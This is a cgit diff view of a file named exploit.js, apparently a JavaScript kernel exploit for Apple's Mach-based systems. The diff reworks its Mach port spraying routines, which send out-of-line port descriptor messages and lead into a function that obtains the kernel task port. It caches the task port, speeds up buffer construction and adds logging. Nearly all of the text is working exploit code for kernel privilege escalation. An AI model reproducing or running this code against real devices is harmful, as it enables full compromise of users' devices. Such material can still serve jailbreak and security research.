summaryrefslogtreecommitdiff
path: root/src/js/kexp
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-x[-rw-r--r--]src/js/kexp/exploit.js79
1 files changed, 65 insertions, 14 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c28e59c..e0ef574 100644..100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
var req_init_port_set_address = 0x0
var req_init_port_set_count = 0x4
+var task_self = 0;
var kslide = 0;
var fakeportData = 0;
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) {
function copyinPort(kport, cnt) {
var err = malloc(4);
var ret = 0;
- var self = mach_task_self();
+ var self = task_self;
var service = MACH_PORT_NULL;
var client = malloc(4);
var it = malloc(4);
@@ -180,23 +181,43 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports\n");
+ printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
}
var mp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
- printf("%x\n", read_u32(mp));
- mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ var rmp = read_u32(mp);
+ mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ send_ports(rmp, read_u32(kp), 2, number_port_descs);
return mp;
}
+function fast_log2(n) {
+ var i = 0;
+ while (n >>= 1) {
+ i++;
+ }
+
+ return i;
+}
+
+function fast_array_mul(arr, n) {
+ var tmp_arr = arr;
+ var done = 0;
+ for (var i = 0; i < fast_log2(n) + 2; i++) {
+ tmp_arr = tmp_arr.concat(tmp_arr);
+ done = (1 << i);
+ }
+
+ return tmp_arr;
+}
+
function send_ports(target, payload, num, number_port_descs) {
var init_port_set = malloc(num * 4);
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(init_port_set + (i << 2), payload);
}
- var buf = malloc(0x1c + (number_port_descs * 0xc));
+ var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+
write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+ var new_buf_ = new Array();
+ var tmp = u32_to_u8x4(init_port_set);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ tmp = u32_to_u8x4(num);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ new_buf_.push(0);
+ new_buf_.push(0);
+ new_buf_.push(19);
+ new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+
+ var new_buf = fast_array_mul(new_buf_, number_port_descs);
+
+ fast_write_buf(buf + req_init_port_set, new_buf);
+
+ /*
for (var i = 0; i < number_port_descs; i++) {
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }
+ }*/
write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
write_u32(buf + req_head_msgh_request_port, target);
write_u32(buf + req_head_msgh_reply_port, 0);
write_u32(buf + req_head_msgh_id, 1337);
- return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+
+ free(buf);
+
+ printf("%d %s\n", ret, mach_error_string(ret));
+
+ return ret;
}
function get_kernel_task() {
@@ -229,11 +278,13 @@ function get_kernel_task() {
sanity_port = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port);
- mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
+ task_self = mach_task_self();
+
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
+ mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
limits = malloc(4);
write_u32(limits, 1000);
- mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
+ mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
printf("starting exploit\n");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 23:46:12 +0000